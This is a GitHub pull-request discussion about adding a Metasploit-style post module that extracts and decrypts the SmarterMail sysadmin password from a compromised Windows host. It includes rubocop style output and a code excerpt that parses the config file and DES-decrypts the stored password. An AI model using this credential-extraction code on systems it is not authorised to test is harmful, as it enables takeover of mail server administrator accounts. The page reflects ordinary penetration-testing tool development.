New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Windows Gather SmarterMail Password Extraction post module #2934
Conversation
Checking it with rubocop for compliance with the Ruby Style guide and some mods I have seen @jvazquez-r7 I have seen request: infidel02:Meterpreter-Scripts carlos$ rubocop -c rubocop-todo.yml post/windows/gather/smartermail.rb Inspecting 1 file C Offences: post/windows/gather/smartermail.rb:1:1: C: Missing utf-8 encoding comment. ## ^ post/windows/gather/smartermail.rb:14:22: C: Surrounding space missing in default value assignment. def initialize(info={}) ^ post/windows/gather/smartermail.rb:15:11: C: Space inside parentheses detected. super( update_info( info, ^ post/windows/gather/smartermail.rb:15:24: C: Space inside parentheses detected. super( update_info( info, ^ post/windows/gather/smartermail.rb:16:9: C: Align the parameters of a method call if they span more than one line. 'Name' => 'Windows Gather SmarterMail Password Extraction', ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ post/windows/gather/smartermail.rb:31:14: C: Space inside square brackets detected. [ 'URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/'] ^ post/windows/gather/smartermail.rb:33:29: C: Space inside square brackets detected. 'Platform' => [ 'win' ], ^ post/windows/gather/smartermail.rb:33:35: C: Space inside square brackets detected. 'Platform' => [ 'win' ], ^ post/windows/gather/smartermail.rb:34:29: C: Space inside square brackets detected. 'SessionTypes' => [ 'meterpreter' ] ^ post/windows/gather/smartermail.rb:34:43: C: Space inside square brackets detected. 'SessionTypes' => [ 'meterpreter' ] ^ post/windows/gather/smartermail.rb:36:1: C: Extra empty line detected at body end. post/windows/gather/smartermail.rb:42:19: C: Use def with parentheses when there are parameters. def decrypt_des encrypted ^^^^^^^^^ post/windows/gather/smartermail.rb:48:5: C: Redundant `return` detected. return decipher.update(encrypted) + decipher.final ^^^^^^ post/windows/gather/smartermail.rb:55:41: C: Prefer single-quoted strings when you don't need string interpolation or special symbols. drive = session.fs.file.expand_path("%SystemDrive%") ^^^^^^^^^^^^^^^ post/windows/gather/smartermail.rb:83:20: C: Avoid the use of Perl-style backrefs. @username = "#{$1}" if data =~ /(.+)<\/sysAdminUserName>/ ^^ post/windows/gather/smartermail.rb:84:56: C: Avoid the use of Perl-style backrefs. @password = decrypt_des(Rex::Text.decode_base64("#{$1}")) if data =~ /(.+)<\/sysAdminPassword>/ ^^ post/windows/gather/smartermail.rb:84:101: C: Line is too long. [117/100] @password = decrypt_des(Rex::Text.decode_base64("#{$1}")) if data =~ /(.+)<\/sysAdminPassword>/ ^^^^^^^^^^^^^^^^^ post/windows/gather/smartermail.rb:93:24: C: Prefer single-quoted strings when you don't need string interpolation or special symbols. if session.type != "meterpreter" ^^^^^^^^^^^^^ post/windows/gather/smartermail.rb:94:101: C: Line is too long. [101/100] print_error "#{@host} (#{@comp}) - Only meterpreter sessions are supported by this post module" ^ post/windows/gather/smartermail.rb:115:101: C: Line is too long. [107/100] print_good "#{@host} (#{@comp}) - Found credentials. Username: '#{@username}' Password: '#{@password}'" ^^^^^^^ post/windows/gather/smartermail.rb:124:3: C: Source files should end with a newline (\n). end ^ 1 file inspected, 21 offences detected |
# | ||
# Retrieve username and decrypt encrypted password string from the config file | ||
# | ||
def get_smartermail_creds(path) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You are using Class variables, I believe they should be avoided, try modifying the method to return a hash maybe with the values and check the returned values.
+ def get_smartermail_creds(path) + vprint_status "#{@host} (#{@comp}) - Retrieving SmarterMail sysadmin password" + begin + data = read_file("#{path}") || '' + rescue Rex::Post::Meterpreter::RequestError => e + print_error "#{@host} (#{@comp}) - Failed to download #{path} - #{e}" + return + end + if data.nil? + print_error "#{@host} (#{@comp}) - Configuration file is empty." + return + end + @username = "#{$1}" if data =~ /(.+)<\/sysAdminUserName>/ + @password = decrypt_des(Rex::Text.decode_base64("#{$1}")) if data =~ /(.+)<\/sysAdminPassword>/ + end
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah makes sense. I was just being lazy. I'll change it to a hash.
link to rubocop https://github.com/bbatsov/rubocop and the yml file can be found here for reference https://www.dropbox.com/s/9pbuy35ggodus1v/rubocop-jv-style.yml |
Made suggested changes in commit 62dca11:
|
I'll be processing this before Monday comes, thanks. |
Made some changes to make sure it supports shell sessions. Will be merged in a bit. Demos (for both shell & meterpreter session types):
|
Add Windows Gather SmarterMail Password Extraction post module.
Homepage: http://www.smartertools.com/smartermail/mail-server-software.aspx
Source: http://www.smartertools.com/smartermail/mail-server-download.aspx
Tested on: SmarterMail versions 10.7.4842 and 11.7.5136 (Windows 7)
Example Output
Example Verbose Output